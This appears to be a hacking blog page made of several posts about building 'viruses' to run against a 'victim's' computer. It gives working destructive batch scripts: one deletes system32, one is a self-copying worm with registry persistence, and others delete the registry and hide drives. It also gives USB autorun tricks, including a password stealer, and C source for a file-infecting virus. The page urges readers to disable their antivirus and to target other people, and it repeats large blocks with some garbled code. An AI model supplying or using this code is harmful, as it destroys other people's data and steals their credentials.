What is Computer Viruses & How to check antivirus working properly or not
What is Computer Viruses ?
A computer virus is a computer programm that can copy itself and infect a computer without any permission or in the knowledge of user.
A computer virus can only spread from one computer to another computer when it's host is taken to the uninfected computer for instance by a user sending it over a network or the internet or by carrying it on a removable medium such as floppy disk, USB (Universal Serial Bus) drive, CD (Compact Disc)
![]() |
Types of computer viruses |
1. Open Notepad
2. Copy paste the code below in Notepad
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR- STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
3. Save file as check-antivirus.bat (*.bat). After sometime scan your file with your antivirus.
If your anti-virus program detect the file a virus,then you sure that your anti-virus program is working properly.
If not detect the file a virus , this is a right time change your anti-virus
If you have any concerns or any difficulties on this guide then feel free to place a reply on this thread to get instant help.
--------------------------------------------------------------------------------------------------------------------------------------------
Destroy Your Victim's Computer !
Destroy Your Victim's Computer Using Simple Notepad Virus.
![]() |
Virus Alert |
This guide is for education purpose only.
Don't MISUSE of this virus.
In this post we’ll know how to create a deadly computer viruses to destroy your victim's Personal computer...;)
Open Notepad & Type or Paste the following command in the Notepad:
del c:\windows\system32\*.* /q
Save it with extension “.bat or .cmd” .
Don’t click on the file otherwise you are in trouble. Why....?
Because the file you created that deletes all files from your system32 folder and when you restart your Personal Computer ( PC ) it won't start because system can't find the files in the system32 folder which is required at the booting time.
You can also test this virus by making a fake folder.
Let suppose :
windows 1 in Local disk C :
Copy some old files in it and just follow the above command. Clicking on the “ bat or cmd ” files your all files deleted automatically.
Don't try this file on your own computer. " Before release this virus in victim's Personal Computer you think they damaged victim's computer badly. So, think again before trying this on Victim’s Personal Computer . "
Virus 2 :
This blog's help you to send viruses to your Victim's Email.
Type & Paste the given code in your Notepad, then save it as "anyname".bat
Don't click on the batch file you created. Send it to your Victim's Email..;)
1) Copy itself into startup.
2) Copy itself over one thousand times into random spots in your computer.
3) Hide itself's and all other created files.
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one.
6) Opens alert boxes.
7) Changes the time to 12:00 and shuts down the computer.
Secret Code :-
@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP
" H4ck if you can "
White H4t H4ck3r's
--------------------------------------------------------------------------------------------------------------------------------------------
How To Shutdown Computer Using PenDrive
Step 1: Copy this code into notepad:
@echo off
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).
Step 2: Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable
Save it as "autorun.inf"
//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
wan't any help? please comment.
--------------------------------------------------------------------------------------------------------------------------------------------
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).
Open=filename.bat
Action=Mouse Disable
Save it as "autorun.inf"
//don't forget to change the "filname.bat" with your filname.bat.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
--------------------------------------------------------------------------------------------------------------------------------------------
How To Disable Hard Disk Of A Computer or Laptop
Step 1 : Open Notepad.
Step 2 : Copy This Code..
--------------------------------------------------------------------------------------------------------------------
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
------------------------------------------------------------------------------------------------------------------------
Step 3 >> Paste Into Notepad.
Step 4 >> Save Fie As DisableHardDisk.bat (.Bat is Must).
Note :- Your sharing will help us to grow so please share it.
------------------------------------------------------------------------------------------------------------------------
HACK COMPUTER THROUGH VIRUS
This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“.”,&ffblk,0); //Search for a file with any extension (.)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:
Download Source code
How the Virus Program Works?
The algorithm of this virus program is as follows :
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program :
For a step-by-step guide, you can refer my detailed post on how to compile C programs?
How to Test the Virus After the Compilation:
Create a new empty folder.
Put some executable files (or any other files) in the folder.
Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
#. WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
------------------------------------------------------------------------------------------------------------------------
How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5 mins.
Copy and paste the following codes in the notepad.
After paste in notepad save file as " .bat "
Do it at your own risk.
------------------------------------------------------------------------------------------------------------------------
ShutDown PC million Times::::
Shutting down million times
1.Right click on the desktop
2.Click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.You will get another dialogue box, write in it: Internet Explorer and press finish.
4.You will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok.
try to open it, it is a virus hehe
Step 1 : Open Notepad.
Step 2 : Copy This Code..
--------------------------------------------------------------------------------------------------------------------
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
------------------------------------------------------------------------------------------------------------------------
Step 3 >> Paste Into Notepad.
Step 4 >> Save Fie As DisableHardDisk.bat (.Bat is Must).
Step 2 : Copy This Code..
--------------------------------------------------------------------------------------------------------------------
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
------------------------------------------------------------------------------------------------------------------------
Step 3 >> Paste Into Notepad.
Step 4 >> Save Fie As DisableHardDisk.bat (.Bat is Must).
Note :- Your sharing will help us to grow so please share it.
------------------------------------------------------------------------------------------------------------------------
HACK COMPUTER THROUGH VIRUS
This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“.”,&ffblk,0); //Search for a file with any extension (.)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:
Download Source code
How the Virus Program Works?
The algorithm of this virus program is as follows :
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program :
For a step-by-step guide, you can refer my detailed post on how to compile C programs?
How to Test the Virus After the Compilation:
Create a new empty folder.
Put some executable files (or any other files) in the folder.
Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
You can download the source code from the following link:
Download Source code
How the Virus Program Works?
The algorithm of this virus program is as follows :
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program :
For a step-by-step guide, you can refer my detailed post on how to compile C programs?
How to Test the Virus After the Compilation:
Create a new empty folder.
Put some executable files (or any other files) in the folder.
Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
#. WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
------------------------------------------------------------------------------------------------------------------------
How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5 mins.
Copy and paste the following codes in the notepad.
After paste in notepad save file as " .bat "
Do it at your own risk.
------------------------------------------------------------------------------------------------------------------------
ShutDown PC million Times::::
Shutting down million times
1.Right click on the desktop
2.Click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.You will get another dialogue box, write in it: Internet Explorer and press finish.
4.You will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok.
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a
------------------------------------------------------------------------------------------------------------------------
Registry Deleter
Computer Registry |
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Copy and paste the following codes in notepad and save file as anyname.bat
Execute virus on your computer at your own risk.
Purpose:- Once executed it will delete your's computer registry files and leave a message.
Warning :- Disable your Antivirus while creating the viruses. Otherwise Antivirus deleted your file that you created. Execute virus in victim's Laptop / Personal Computer ( PC ) not in your personal Laptop / PC. Do it at your own risk.
If you have any concerns or any difficulties on this guide then feel free to place a reply on this thread to get instant help.
Warning :- Disable your Antivirus while creating the viruses. Otherwise Antivirus deleted your file that you created. Execute virus in victim's Laptop / Personal Computer ( PC ) not in your personal Laptop / PC. Do it at your own risk.
If you have any concerns or any difficulties on this guide then feel free to place a reply on this thread to get instant help.
Published by :- Sharad Srivastava
------------------------------------------------------------------------------------------------------------------------
How to steal saved password's from your victim's computer
Just follow the steps.
Step 1 :- Open a notepad and input the following text.
[ autorun ]
open = launch.bat
ACTION = Perform a virus scan
Step 2 :- Save in the notepad and name it.
" autorun.inf "
after saving now copy the " autorun.inf " file in your pendrive (USB Stick).
Step 3 :- Open a notepad again and write the following text to it.
Start mspass.exe/stext mspass.txt
Start mailpv.exe/stext mailpv.txt
Start iepv.exe/stext iepv.txt
Start pspv.exe/stext pspv.txt
Start passwordfox.exe/stext passwordfox.txt
Step 4 :- Save in the notepad and name it.
" launch.bat "
copy the " launch.bat " file in your pendrive and now your password stealer is ready to launch in your victim's computer.
Warning :- Disable your Antivirus while creating the viruses. Otherwise Antivirus deleted your file that you created. Execute virus in victim's Laptop / Personal Computer ( PC ) not in your personal Laptop / PC. Do it at your own risk.
If you have any concerns or any difficulties on this guide then feel free to place a reply on this thread to get instant help.
------------------------------------------------------------------------------------------------------------------------
Matrix effect and a Little bit of virus history
The First virus was called " Creeper ". It was invented in early 1970's. Since, millions of virus has been invented.
The First known computer virus was written in 1981 by a man named Rich Skrenta.
![]() |
Computer Virus |
Types of computer viruses.
Boot Sector virus.
Direct Action Virus.
File Infector Virus.
Macro Virus.
Multipartite Virus.
Polymorphic Virus.
Resident Virus.
Webscripting Virus.
Matrix Effect
Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
- Open Notepad.
- Copy or Type the below mentioned text in your Notepad : -
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
- Save the file with " .bat " extension like Matrixeffect.bat or choose another name according to you.
- Then save the file.
Thats it. Just open the file to see the matrix effect right before your eye
![]() |
Matrix effect |
Warning :- Disable your Antivirus while creating the viruses. Otherwise Antivirus deleted your file that you created. Execute virus in victim's Laptop / Personal Computer ( PC ) not in your personal Laptop / PC.
If you have any concerns or any difficulties on this guide then feel free to place a reply on this thread to get instant help.
------------------------------------------------------------------------------------------------------------------------
No comments:
Post a Comment